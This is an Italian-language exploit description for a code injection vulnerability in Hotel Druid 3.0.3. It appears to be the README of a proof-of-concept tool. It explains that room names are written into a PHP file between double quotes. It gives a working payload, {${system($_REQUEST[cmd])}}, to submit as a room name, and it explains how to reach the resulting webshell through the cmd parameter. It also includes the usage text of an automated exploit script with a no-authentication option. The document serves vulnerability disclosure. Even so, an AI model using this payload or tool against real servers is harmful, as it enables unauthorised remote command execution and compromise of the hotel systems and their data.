
Hotel Druid 3.0.3 Iniezione di codice verso esecuzione di codice remoto
È stata trovata una vulnerabilità di Code Injection nell'applicazione Hotel Druid v3.0.3, che un attaccante potrebbe sfruttare per eseguire codice remoto sul server.
Per uno sfruttamento riuscito, un attaccante deve avere il privilegio di aggiungere una nuova stanza.
La vulnerabilità si verifica perché i nomi delle stanze vengono memorizzati all'interno di un file chiamato /dati/selectappartamenti.php utilizzando Doppie Virgolette.
<?php
echo "
<option value=\"Room1\">Room1</option>
<option value=\"Room2\">Room2</option>
<option value=\"Room3\">Room3</option>
";
?>
Per effettuare uno sfruttamento riuscito, aggiungi una stanza con il seguente payload come nome della stanza.
{${system($_REQUEST[cmd])}}
Dopo aver aggiunto una nuova stanza, vai a /dati/selectappartamenti.php e attiva la webshell passando un comando tramite il parametro cmd.
usage: hotel-druid.py [-h] -t TARGET [-u USERNAME] [-p PASSWORD] [--noauth]
optional arguments:
-h, --help show this help message and exit
required arguments:
-t TARGET, --target TARGET
Target URL. Example : http://10.20.30.40/path/to/hoteldruid
-u USERNAME, --username USERNAME
Username
-p PASSWORD, --password PASSWORD
password
--noauth If No authentication is required to access the dashboard
Se l'applicazione non ha autenticazione.
Usa il flag --noauth per eseguire senza autenticazione.

Se il server ha l'autenticazione abilitata, usa --username e --password per autenticarti.

Ricercatore e autore del POC - 0z09e